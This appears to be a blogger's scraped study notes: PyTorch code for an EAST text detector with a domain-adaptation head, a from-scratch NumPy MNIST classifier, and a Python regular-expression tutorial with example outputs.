        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        98
        99
        class merge(nn.Module):  # EAST 的核心特征融合层。负责在特征图上进行一系列卷积操作并融合来自不同尺度的特征。它的主要任务是通过逐步上采样和融合不同层的特征图来生成最终的输出特征图。这通常用于目标检测和分割任务中的特征融合阶段。
        def __init__(self):
        super(merge, self).__init__()

        self.conv1 = nn.Conv2d(1024, 128, 1)
        self.bn1 = nn.BatchNorm2d(128)
        self.relu1 = nn.ReLU()
        self.conv2 = nn.Conv2d(128, 128, 3, padding=1)
        self.bn2 = nn.BatchNorm2d(128)
        self.relu2 = nn.ReLU()

        self.conv3 = nn.Conv2d(384, 64, 1)
        self.bn3 = nn.BatchNorm2d(64)
        self.relu3 = nn.ReLU()
        self.conv4 = nn.Conv2d(64, 64, 3, padding=1)
        self.bn4 = nn.BatchNorm2d(64)
        self.relu4 = nn.ReLU()

        self.conv5 = nn.Conv2d(192, 32, 1)
        self.bn5 = nn.BatchNorm2d(32)
        self.relu5 = nn.ReLU()
        self.conv6 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn6 = nn.BatchNorm2d(32)
        self.relu6 = nn.ReLU()

        self.conv7 = nn.Conv2d(32, 32, 3, padding=1)
        self.bn7 = nn.BatchNorm2d(32)
        self.relu7 = nn.ReLU()

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)
        elif isinstance(m, nn.BatchNorm2d):
        nn.init.constant_(m.weight, 1)
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # F.interpolate:将特征图上采样到较大的空间分辨率,使用 bilinear 插值方法。
        # torch.cat:将上采样后的特征图与来自不同层的特征图沿通道维度拼接,结合不同尺度的信息。
        y = F.interpolate(x[3], scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[2]), 1)
        y = self.relu1(self.bn1(self.conv1(y)))
        y = self.relu2(self.bn2(self.conv2(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[1]), 1)
        y = self.relu3(self.bn3(self.conv3(y)))
        y = self.relu4(self.bn4(self.conv4(y)))

        y = F.interpolate(y, scale_factor=2, mode='bilinear', align_corners=True)
        y = torch.cat((y, x[0]), 1)
        y = self.relu5(self.bn5(self.conv5(y)))
        y = self.relu6(self.bn6(self.conv6(y)))

        y = self.relu7(self.bn7(self.conv7(y)))
        return y


        class output(nn.Module): # 输出层
        def __init__(self, scope=512):
        super(output, self).__init__()
        self.conv1 = nn.Conv2d(32, 1, 1) # 卷积层,用于处理输入的特征图。它们的输出通道数不同,目的是生成不同类型的预测。
        self.sigmoid1 = nn.Sigmoid() # 分别应用于卷积层输出的 Sigmoid 激活函数,用于输出概率。

        # self.conv1_1 = nn.Conv2d(32, 1, 1)
        # self.sigmoid1_1 = nn.Sigmoid()

        self.conv2 = nn.Conv2d(32, 4, 1)
        self.sigmoid2 = nn.Sigmoid()
        self.conv3 = nn.Conv2d(32, 1, 1)
        self.sigmoid3 = nn.Sigmoid()
        self.scope = 512 # 一个用于缩放位置预测的参数,设为 512。

        # GRL domina classifier
        # self.gap = nn.AdaptiveAvgPool2d(1)
        # self.sigmoid_gap = nn.Sigmoid()
        # self.GRL = RevGrad()
        # self.conv_gap = nn.Conv2d(32, 1, 1)

        for m in self.modules():
        if isinstance(m, nn.Conv2d):
        nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu') # 卷积层的权重使用 Kaiming 正态分布初始化,偏置项初始化为 0。
        if m.bias is not None:
        nn.init.constant_(m.bias, 0)

        def forward(self, x):
        # score_1 = self.GRL(x)
        # grl = self.sigmoid_gap(self.conv_gap(score_1))

        # domain_feature = self.gap(self.GRL(C[3]))
        # class_domain = self.sigmoid_gap(self.conv_gap(domain_feature))

        score = self.sigmoid1(self.conv1(x)) # 第一个卷积层的输出,经过 Sigmoid 激活函数处理,代表得分图。
        loc = self.sigmoid2(self.conv2(x)) * self.scope # 第二个卷积层的输出,经过 Sigmoid 激活函数处理并缩放,表示位置预测。
        angle = (self.sigmoid3(self.conv3(x)) - 0.5) * math.pi # 第三个卷积层的输出,经过 Sigmoid 激活函数处理并调整,表示角度预测。
        geo = torch.cat((loc, angle), 1) # 将位置和角度预测拼接起来,形成最终的几何输出。
        return score, geo
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        64
        65
        66
        67
        68
        69
        70
        71
        72
        73
        74
        75
        76
        77
        78
        79
        80
        81
        82
        83
        84
        85
        86
        87
        88
        89
        90
        91
        92
        93
        94
        95
        96
        97
        class DAImgHead(nn.Module):
        """
        Adds a simple Image-level Domain Classifier head 添加一个图像级领域分类器头,用于图像层面的分类。
        """

        def __init__(self):
        """
        Arguments:
        in_channels (int): number of channels of the input feature 输入特征的通道数
        USE_FPN (boolean): whether FPN feature extractor is used 是否使用 FPN 特征提取器
        """
        super(DAImgHead, self).__init__()

        self.conv1_da = nn.Conv2d(512, 256, kernel_size=1, stride=1) # 一个卷积层,将输入通道数从 512 转换为 256。
        self.conv2_da = nn.Conv2d(256, 1, kernel_size=1, stride=1) # 一个卷积层,将通道数从 256 转换为 1。

        for l in [self.conv1_da, self.conv2_da]: # 权重初始化为均值为 0,标准差为 0.001 的正态分布,偏置初始化为 0。
        torch.nn.init.normal_(l.weight, std=0.001)
        torch.nn.init.constant_(l.bias, 0)

        def forward(self, x): # 输入 x 经过 conv1_da 和 ReLU 激活函数后,再经过 conv2_da 得到输出。
        t = F.relu(self.conv1_da(x))
        return self.conv2_da(t)


class DAInsHead(nn.Module):
    """
    Adds a simple instance-level domain classifier head.
    """

    def __init__(self):
        """
        Arguments:
            in_channels (int): number of channels of the input feature
        """
        super(DAInsHead, self).__init__()
        self.fc1_da = nn.Linear(2028, 1024) # a fully connected layer mapping 2028 input features to 1024 outputs
        self.fc2_da = nn.Linear(1024, 1024) # a fully connected layer mapping 1024 input features to 1024 outputs
        self.fc3_da = nn.Linear(1024, 1) # a fully connected layer mapping 1024 input features to 1 output
        for l in [self.fc1_da, self.fc2_da]: # fc1_da and fc2_da weights use a normal distribution with mean 0 and std 0.01; fc3_da uses std 0.05; all biases start at 0
            nn.init.normal_(l.weight, std=0.01)
            nn.init.constant_(l.bias, 0)
        nn.init.normal_(self.fc3_da.weight, std=0.05)
        nn.init.constant_(self.fc3_da.bias, 0)

    def forward(self, x): # x goes through fc1_da with ReLU, a 50% dropout, fc2_da with ReLU, another 50% dropout, and finally fc3_da
        x = F.relu(self.fc1_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = F.relu(self.fc2_da(x))
        x = F.dropout(x, p=0.5, training=self.training)

        x = self.fc3_da(x)
        return x


class DomainAdaptationModule(torch.nn.Module):
    """
    Module for the Domain Adaptation component. Takes feature maps from the backbone,
    instance feature vectors, domain labels and proposals. Works for both FPN and
    non-FPN setups. Its main purpose is to process image features through domain
    adaptation so the model generalizes better across domains.
    """

    def __init__(self):
        super(DomainAdaptationModule, self).__init__()

        self.avgpool = nn.AvgPool2d(kernel_size=7, stride=7) # a 7x7 average pooling layer that shrinks the input feature map
        self.gap = nn.AdaptiveAvgPool2d(1) # adaptive average pooling that squeezes each channel of the feature map to a single value
        self.sigmoid_gap = nn.Sigmoid() # a sigmoid that squashes the feature values into [0, 1]

        self.grl_img = GradientScalarLayer(-1.0 * 0.1) # gradient reversal layer: flips the gradient during backprop, encouraging the network to learn domain-invariant features
        self.grl_ins = GradientScalarLayer(-1.0 * 0.1)
        self.grl_img_consist = GradientScalarLayer(1.0 * 0.1) # like grl_img and grl_ins, but used for the consistency objective
        self.grl_ins_consist = GradientScalarLayer(1.0 * 0.1)

        self.imghead = DAImgHead() # head that processes image-level features for domain classification
        self.inshead = DAInsHead() # head that processes instance-level features for domain classification

    def forward(self, img_features):
        """
        Arguments:
            img_features (list[Tensor]): features computed from the images that are used for computing the predictions
            da_ins_feature (Tensor): instance-level feature vectors
            da_ins_labels (Tensor): domain labels for the instance-level feature vectors
            targets (list[BoxList]): ground-truth boxes present in the image (optional)

        Returns:
            losses (dict[Tensor]): the losses for the model during training. During testing, it is an empty dict.
        """
        img_grl_fea = self.grl_img(self.gap(img_features)) # squeeze the feature map to 1x1 with gap, then reverse the gradient with grl_img

        da_img_features = self.sigmoid_gap(self.imghead(img_grl_fea)) # pass the reversed image-level features through imghead, then squash each value into [0, 1]

        return da_img_features
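
GradientScalarLayer is not defined in this excerpt. Below is a minimal sketch of how such a layer is commonly implemented (identity in the forward pass, gradient multiplied by a fixed weight in the backward pass, so a negative weight reverses it), assuming the constructor signature used above:

from torch.autograd import Function

class _GradientScalar(Function):
    @staticmethod
    def forward(ctx, x, weight):
        ctx.weight = weight
        return x.view_as(x)  # identity in the forward pass

    @staticmethod
    def backward(ctx, grad_output):
        # scale the gradient; a negative weight reverses its sign
        return ctx.weight * grad_output, None

class GradientScalarLayer(torch.nn.Module):
    def __init__(self, weight):
        super(GradientScalarLayer, self).__init__()
        self.weight = weight

    def forward(self, x):
        return _GradientScalar.apply(x, self.weight)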
class EAST(nn.Module): # EAST inherits from nn.Module, the base class of all PyTorch models
    def __init__(self, pretrained=True):
        super(EAST, self).__init__()
        self.extractor = extractor(pretrained) # the feature extractor, a convolutional backbone that extracts features from the input image; pretrained=True loads pretrained weights
        self.merge = merge() # the merge module, which fuses the extracted features
        self.output = output() # the output module, which produces the final predictions

        self.DomainAdaptation = DomainAdaptationModule() # the domain adaptation module, which adapts the features to different data distributions

    def forward(self, x): # forward defines how the input x flows through the network
        C = self.extractor(x) # pass x through the feature extractor; C is a collection of feature maps, of which C[3] is one
        class_domain = self.DomainAdaptation(C[3]) # pass the feature map C[3] through the domain adaptation module

        return self.output(self.merge(C)), class_domain
        # self.merge(C): fuse the features from different levels
        # self.output(self.merge(C)): turn the merged features into the final predictions
        # the return value is a pair: the model's detection output and the domain classifier's output
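
A hypothetical smoke test (extractor, merge and output are defined elsewhere in this project, so the shapes below are assumptions; EAST inputs are usually sized in multiples of 32):

model = EAST(pretrained=False)
model.eval()
with torch.no_grad():
    x = torch.randn(1, 3, 256, 256)       # a dummy RGB image
    (score, geo), class_domain = model(x) # detection outputs plus the domain classifier output
print(score.shape, geo.shape, class_domain.shape)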

        3.3 Text Self-Training

• Self Training article roundup - Zhihu (zhihu.com)

For font recognition in scene text editing: once the font is identified, pull the other characters of that font directly from the font file, as a fallback for font generation.

Other: Font Recognition with Deep Learning | by Jehad Mohamed | MLearning.ai | Medium. This one is older (2015); it basically just throws convolutional neural networks at the problem.

Text Recognition in the Wild: A Survey

See: [Paper-Text Recognition in the Wild-A Survey-Zi-Zi’s Journey](…//Paper-Text Recognition in the Wild-A Survey/)


          Plan-2

Contents

Import the required libraries

import numpy as np
import pandas as pd
from matplotlib import pyplot as plt

Read the dataset

data = pd.read_csv('kaggle/input/digit-recognizer/train.csv')

data.shape
        (42000, 785)
         

Array shape: $(42000, 785)$, meaning:


Split the dataset into a training set and a validation set

data = np.array(data)  # convert the dataset from a pd.DataFrame to an np.array
m, n = data.shape
np.random.shuffle(data) # shuffle operates in place: it reorders the original array and returns nothing

# validation set
data_dev = data[0:1000].T # the first 1000 samples
Y_dev = data_dev[0]
X_dev = data_dev[1:n]
X_dev = X_dev / 255. # map each pixel's grayscale value to a float in [0, 1] so the later exp computation does not overflow

# training set
data_train = data[1000:m].T
Y_train = data_train[0]
X_train = data_train[1:n]
X_train = X_train / 255.
_, m_train = X_train.shape

Define the helper functions

Our NN will have a simple two-layer architecture. Input layer $a^{[0]}$ will have $784$ units corresponding to the $784$ pixels in each $28\times 28$ input image. A hidden layer $a^{[1]}$ will have $10$ units with ReLU activation, and finally our output layer $a^{[2]}$ will have $10$ units corresponding to the ten digit classes with softmax activation.


Initialize the parameters

Draw the initial parameters uniformly at random from [-0.5, 0.5).

np.random.rand() returns samples drawn uniformly from [0, 1): the range includes 0 but excludes 1.

def init_params():
    W1 = np.random.rand(10, 784) - 0.5
    b1 = np.random.rand(10, 1) - 0.5
    W2 = np.random.rand(10, 10) - 0.5
    b2 = np.random.rand(10, 1) - 0.5
    return W1, b1, W2, b2

Activation function: ReLU

def ReLU(Z):
    return np.maximum(Z, 0)

        Softmax

$\mathrm{Softmax}(z_i)=\frac{e^{z_i}}{\sum_{c=1}^{C} e^{z_c}}$, where $z_i$ is the output of the $i$-th node and $C$ is the number of output nodes, i.e. the number of classes. The Softmax function turns the multi-class outputs into a probability distribution: every value lies in [0, 1] and they sum to 1.


def softmax(Z):
    A = np.exp(Z) / sum(np.exp(Z))
    return A
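
Because the pixels were scaled into [0, 1], the exp above will not overflow here. For larger inputs, a numerically stable variant (a sketch, not part of the original notebook) first subtracts the column-wise maximum, which leaves the result unchanged:

def softmax_stable(Z):
    Z_shifted = Z - Z.max(axis=0, keepdims=True) # shifting each column by a constant does not change the softmax
    expZ = np.exp(Z_shifted)
    return expZ / expZ.sum(axis=0, keepdims=True)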

Forward propagation

    $$Z^{[1]} = W^{[1]} X + b^{[1]}$$
$$A^{[1]} = g_{\text{ReLU}}(Z^{[1]})$$
    $$Z^{[2]} = W^{[2]} A^{[1]} + b^{[2]}$$
    $$A^{[2]} = g_{\text{softmax}}(Z^{[2]})$$

def forward_prop(W1, b1, W2, b2, X):
    Z1 = W1.dot(X) + b1
    A1 = ReLU(Z1)
    Z2 = W2.dot(A1) + b2
    A2 = softmax(Z2)
    return Z1, A1, Z2, A2

The derivative of the ReLU function, used in gradient descent

def ReLU_deriv(Z):
    return Z > 0

One-hot encoding

Convert the labels Y to one-hot encoding:

def one_hot(Y):
    one_hot_Y = np.zeros((Y.size, Y.max() + 1))
    one_hot_Y[np.arange(Y.size), Y] = 1
    one_hot_Y = one_hot_Y.T
    return one_hot_Y
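
A quick sanity check on a toy label vector (illustrative only); each column is the one-hot encoding of one sample:

one_hot(np.array([2, 0, 1]))
# array([[0., 1., 0.],
#        [0., 0., 1.],
#        [1., 0., 0.]])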

Backpropagation

    $$dZ^{[2]} = A^{[2]} - Y$$
    $$dW^{[2]} = \frac{1}{m} dZ^{[2]} A^{[1]T}$$
$$db^{[2]} = \frac{1}{m} \Sigma \, dZ^{[2]}$$

$$dZ^{[1]} = W^{[2]T} dZ^{[2]} \odot g^{[1]\prime} (Z^{[1]})$$
$$dW^{[1]} = \frac{1}{m} dZ^{[1]} A^{[0]T}$$
$$db^{[1]} = \frac{1}{m} \Sigma \, dZ^{[1]}$$

def backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y):
    one_hot_Y = one_hot(Y)
    dZ2 = A2 - one_hot_Y
    dW2 = 1 / m * dZ2.dot(A1.T)
    db2 = 1 / m * np.sum(dZ2)
    dZ1 = W2.T.dot(dZ2) * ReLU_deriv(Z1)
    dW1 = 1 / m * dZ1.dot(X.T)
    db1 = 1 / m * np.sum(dZ1)
    return dW1, db1, dW2, db2

Update the parameters

Update each parameter according to the learning rate alpha:

    $$W^{[2]} := W^{[2]} - \alpha dW^{[2]}$$
    $$b^{[2]} := b^{[2]} - \alpha db^{[2]}$$
    $$W^{[1]} := W^{[1]} - \alpha dW^{[1]}$$
    $$b^{[1]} := b^{[1]} - \alpha db^{[1]}$$

def update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha):
    W1 = W1 - alpha * dW1
    b1 = b1 - alpha * db1
    W2 = W2 - alpha * dW2
    b2 = b2 - alpha * db2
    return W1, b1, W2, b2

Make predictions

numpy.argmax() returns the indices of the maximum elements along the given axis; we take the most probable class as the final prediction.

def get_predictions(A2):
    return np.argmax(A2, 0)

Compute the accuracy

def get_accuracy(predictions, Y):
    print(predictions, Y)
    return np.sum(predictions == Y) / Y.size # accuracy = number correct / total

Gradient descent

def gradient_descent(X, Y, alpha, iterations):
    W1, b1, W2, b2 = init_params() # initialize the parameters
    for i in range(iterations):
        Z1, A1, Z2, A2 = forward_prop(W1, b1, W2, b2, X) # forward propagation
        dW1, db1, dW2, db2 = backward_prop(Z1, A1, Z2, A2, W1, W2, X, Y) # backpropagation
        W1, b1, W2, b2 = update_params(W1, b1, W2, b2, dW1, db1, dW2, db2, alpha) # update the parameters
        if i % 10 == 0: # print the accuracy every 10 iterations
            print("Iteration:", i)
            predictions = get_predictions(A2)
            print("Accuracy:", get_accuracy(predictions, Y))
    return W1, b1, W2, b2

Train the neural network

The final accuracy and the learned network parameters:

W1, b1, W2, b2 = gradient_descent(X_train, Y_train, 0.10, 500)
    Iteration: 0
     [2 2 9 ... 9 2 2] [6 1 2 ... 5 3 1]
 Accuracy: 0.13534146341463416

The final accuracy is 85.01%.

Visualize the training results

Use the trained model to make predictions

def make_predictions(X, W1, b1, W2, b2):
    _, _, _, A2 = forward_prop(W1, b1, W2, b2, X)
    predictions = get_predictions(A2)
    return predictions

def test_prediction(index, W1, b1, W2, b2):
    current_image = X_train[:, index, None]
    prediction = make_predictions(X_train[:, index, None], W1, b1, W2, b2)
    label = Y_train[index]
    print("Prediction: ", prediction)
    print("Label: ", label)

    current_image = current_image.reshape((28, 28)) * 255
    plt.gray() # pyplot's gray() sets the colormap to "gray"
    plt.imshow(current_image, interpolation='nearest')
    plt.show()

    Let’s look at a couple of examples:

test_prediction(0, W1, b1, W2, b2)
test_prediction(1, W1, b1, W2, b2)
test_prediction(2, W1, b1, W2, b2)
test_prediction(3, W1, b1, W2, b2)
    Prediction:  [1]
     Label:  1
     

Evaluate on the validation set

dev_predictions = make_predictions(X_dev, W1, b1, W2, b2)
get_accuracy(dev_predictions, Y_dev)
    [6 3 3 4 3 5 9 2 2 0 6 4 9 5 9 4 1 2 7 9 0 0 3 1 1 2 5 1 0 6 8 4 6 4 1 1 0
      8 3 1 8 4 6 0 0 8 6 0 2 7 9 1 7 8 6 3 3 0 6 1 0 9 6 9 6 4 4 4 4 0 0 7 1 6
      6 0 6 4 7 9 6 1 6 1 5 5 0 2 9 9 3 9 4 9 7 7 9 9 1 1 1 6 0 8 3 7 8 6 0 2 5

    Things to note

How do you use Python's re.search()?

re.search(pattern, string, flags=0)

import re
re.search('n', '\n') # first item is the pattern, second item is the string

# two ways to handle this: one is to escape every backslash with \
# (the other is to prefix the string with r)
re.search('n', '\\n')
    <re.Match object; span=(1, 2), match='n'>
     
# not the best way if we have too many backslashes
re.search('n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')

# r converts to a raw string
re.search('n', r'\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(1, 2), match='n'>
     
"""
There are some nuances you should be aware of: regular expressions
have their own special characters as well, and the patterns '\n'
and r'\n' both look for a newline.
"""
re.search('\n', '\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n')
    <re.Match object; span=(0, 1), match='\n'>
     
# this works as well because the pattern r'\n' also looks for a newline
re.search(r'\n', '\n\n')
    <re.Match object; span=(0, 1), match='\n'>
     
# doesn't work because the raw string contains no real newline, while the pattern r'\n' looks for one
re.search(r'\n', r'\n\n')

    MATCH and SEARCH EXAMPLES

    REs common methods - Match and Search


• matches only at the beginning of the string

    re.match(pattern, string, flags)

# returns None because match only looks at the start of the string
re.match("c", "abcdef")

re.search("c", "abcdef")  # searches anywhere
    <re.Match object; span=(2, 3), match='c'>
     
bool(re.match("c", "abcdef"))  # no match returns boolean False
    False
     
bool(re.match("a", "abcdef"))  # a match returns True
    True
     
# tells you where it matched, first occurrence only
re.search("c", "abcdef")
    <re.Match object; span=(2, 3), match='c'>
     
re.search("c", "abcdefc")  # multiple 'c's: only the first instance is returned
    <re.Match object; span=(2, 3), match='c'>
     
re.search("c", "abdef\nc")  # search works across multiple lines
    <re.Match object; span=(6, 7), match='c'>
     
re.match("c", "\nc")  # match doesn't work across a newline

(re.match("a", "abcdef"))  # match objects
    <re.Match object; span=(0, 1), match='a'>
     

re.match().group(num=0) in Python regex matching

re.match("a", "abcdef").group()  # string output # the default argument is 0
    'a'
     
re.match("a", "abcdef").group(0)
    'a'
     
re.search("n", "abcdefnc abcd").group()
    'n'
     
re.search('n.+', "abcdefnc abcd").group()  # pull out different kinds of strings
# depending on the wildcards you use
    'nc abcd'
     

Python regex (2): the group/start/end/span methods

re.search("c", "abdef\nc").start()
    6
     
re.search("c", "abdef\nc").end()
    7
     

    Literal matching

re.search('na', "abcdefnc abcd")  # doesn't match, because the characters in a pattern are ordered

re.search('n|a', "abcdefnc abcda")  # n or a
    <re.Match object; span=(0, 1), match='a'>
     
re.search('n|a', "bcdefnc abcda")  # replaced the a with b; the first match is an n
    <re.Match object; span=(5, 6), match='n'>
     
re.search('n|a|b', "bcdefnc abcda")  # as many OR expressions as you like
    <re.Match object; span=(0, 1), match='b'>
     

    re.findall

re.findall('n|a', "bcdefnc abcda")  # findall pulls out all instances
    ['n', 'a', 'a']
     
re.search('abcd', "abcdefnc abcd")  # multiple characters - literal search
    <re.Match object; span=(0, 4), match='abcd'>
     
re.findall('abcd', "abcdefnc abcd")
    ['abcd', 'abcd']
     

    CHARACTER SETS


import re
re.search('abcd', "abcdefnc abcd")  # the earlier code
    <re.Match object; span=(0, 4), match='abcd'>
     
re.search(r'\w\w\w\w', "abcdefnc abcd")  # matches letters and numbers
# alphanumeric characters
    <re.Match object; span=(0, 4), match='abcd'>
     

\w matches alphanumeric characters [a-zA-Z0-9_]

re.search(r'\w\w\w\w', "ab_cdefnc abcd")  # matches the _ character
    <re.Match object; span=(0, 4), match='ab_c'>
     
re.search(r'\w\w\w', "a3.!-!")  # doesn't match symbols, only numbers and letters

re.search(r'\w\w\w', "a33-_!").group()
    'a33'
     

\W is the opposite of \w;

    so nothing included in [a-zA-Z0-9_]

re.search(r'\w\w\W', "a3.-_!")  # \W matches non-letter, non-digit characters
    <re.Match object; span=(0, 3), match='a3.'>
     
re.search(r'\w\w\W', "a3 .-_!")  # \W matches whitespace as well
    <re.Match object; span=(0, 3), match='a3 '>
     

    We will go over other character sets later on

re.search(r'\w\w', "abcdefnc abcd")
    <re.Match object; span=(0, 2), match='ab'>
     
re.search(r'\w+', "abcdefnc abcd").group()  # when you don't know the number of letters in the word
    'abcdefnc'
     
re.search(r'\w+\W+\w+', "abcdefnc abcd").group()
    'abcdefnc abcd'
     
re.search(r'\w+\W+\w+', "abcdefnc       abcd").group()  # added spaces
    'abcdefnc       abcd'
     
re.search(r'\w+\W?\w+', "abcdefnabcd").group()  # ? = 0 or 1 instances
    'abcdefnabcd'
     
re.search(r'\w+\W?\w+', "abcde fnabcd").group()
    'abcde fnabcd'
     
re.search(r'\w+\W+\w+', "abcdefnabcd")
    • Pulling out specific amounts

re.search(r'\w{3}', 'aaaaaaaaaaa')  # only 3 \w characters
    <re.Match object; span=(0, 3), match='aaa'>
     
re.search(r'\w{1,4}', 'aaaaaaaaaaa').group()  # 1 is the min, 4 is the max
    'aaaa'
     
re.search(r'\w{1,10}\W{0,4}\w+', "abcdefnc abcd").group()
# 1-10 \w characters,
# 0-4 \W characters,
# 1+ \w characters
    'abcdefnc abcd'
     
re.search(r'\w{1,}\W{0,}\w+', "abcdefnc abcd").group()  # at least 1, at least 0, then 1+
    'abcdefnc abcd'
     

Other types of character sets

    '\d' = matches digits [0-9]

'\D' = matches any non-digit character; ~\d

import re
string = '23abced++'
re.search(r'\d+', string).group()
    '23'
     

'\s' = matches any whitespace character: newlines, tabs, spaces, etc.

'\S' = matches any non-whitespace character; ~\s

string = '23abced++'
re.search(r'\S+', string).group() # no spaces
    '23abced++'
     
string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

Vines and some fungi extend from their tips to explore their surroundings.
Elliot Hawkes of the University of California in Santa Barbara
and his colleagues designed a bot that works
on similar principles. Its mechanical body
sits inside a plastic tube reel that extends
through pressurized inflation, a method that some
invertebrates like peanut worms (Sipunculus nudus)
also use to extend their appendages. The plastic
tubing has two compartments, and inflating one
side or the other changes the extension direction.
A camera sensor at the tip alerts the bot when it’s
about to run into something.

In the lab, Hawkes and his colleagues
programmed the robot to form 3-D structures such
as a radio antenna, turn off a valve, navigate a maze,
swim through glue, act as a fire extinguisher, squeeze
through tight gaps, shimmy through fly paper and slither
across a bed of nails. The soft bot can extend up to
72meters, and unlike plants, it can grow at a speed of
10meters per second, the team reports July 19 in Science Robotics.
The design could serve as a model for building robots
that can traverse constrained environments

This isn’t the first robot to take
inspiration from plants. One plantlike
predecessor was a robot modeled on roots.'''

(re.findall(r'\S+', string))  # returns every word in string
    ['Robots',
      'are',
      'branching',
' '.join(re.findall(r'\S+', string))
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment. Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something. In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'
     

. the dot matches any character except the newline.

string = '''Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.

Vines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.

In the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments

This isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'''

re.search('.+', string).group()  # stops at the first newline
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.'
     
    -
    re.search('.+', string, flags = re.DOTALL).group()
    +
    1
    re.search('.+', string, flags = re.DOTALL).group()
    'Robots are branching out. A new prototype soft robot takes inspiration from plants by growing to explore its environment.\n\nVines and some fungi extend from their tips to explore their surroundings. Elliot Hawkes of the University of California in Santa Barbara and his colleagues designed a bot that works on similar principles. Its mechanical body sits inside a plastic tube reel that extends through pressurized inflation, a method that some invertebrates like peanut worms (Sipunculus nudus) also use to extend their appendages. The plastic tubing has two compartments, and inflating one side or the other changes the extension direction. A camera sensor at the tip alerts the bot when it’s about to run into something.\n\nIn the lab, Hawkes and his colleagues programmed the robot to form 3-D structures such as a radio antenna, turn off a valve, navigate a maze, swim through glue, act as a fire extinguisher, squeeze through tight gaps, shimmy through fly paper and slither across a bed of nails. The soft bot can extend up to 72meters, and unlike plants, it can grow at a speed of 10meters per second, the team reports July 19 in Science Robotics. The design could serve as a model for building robots that can traverse constrained environments\n\nThis isn’t the first robot to take inspiration from plants. One plantlike predecessor was a robot modeled on roots.'
     

    Creating your own character sets

[A-Z]: '-' is a metacharacter when used inside [] (a custom character set)

string = 'Hello, There, How, Are, You'

re.findall('[A-Z]', string)  # pulls out all capital letters
    ['H', 'T', 'H', 'A', 'Y']
     
re.findall('[A-Z,]', string)
# here we search for any capital letter or a comma
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y']
     
string = 'Hello, There, How, Are, You...'
re.findall('[A-Z,.]', string) # inside [] the . is just a literal character, not the "any non-newline character" wildcard
    ['H', ',', 'T', ',', 'H', ',', 'A', ',', 'Y', '.', '.', '.']
     
string = 'Hello, There, How, Are, You...'
re.findall(r'[A-Za-z,\s.]', string) # uppercase letters, lowercase letters, commas, whitespace, periods
    ['H',
      'e',
      'l',

Quantifiers with custom sets

import re
• + one or more occurrences
• ? zero or one occurrence
• * zero or more occurrences
• {} a custom number of occurrences
string = 'HELLO, There, How, Are, You...'

re.search('[A-Z]+', string)
    <re.Match object; span=(0, 5), match='HELLO'>
     
re.findall('[A-Z]+', string)
    ['HELLO', 'T', 'H', 'A', 'Y']
     
re.findall('[A-Z]{2,}', string)  # 2 or more
    ['HELLO']
     
# one or more of the 4 kinds of characters
re.search(r'[A-Za-z\s,]+', string).group()
    'HELLO, There, How, Are, You'
     
re.findall(r'[A-Z]?[a-z\s,]+', string)
    ['O, ', 'There, ', 'How, ', 'Are, ', 'You']
     
# ^ is a metacharacter within brackets
# it negates the set
re.search(r'[^A-Za-z\s,]+', string).group()
    '...'
     
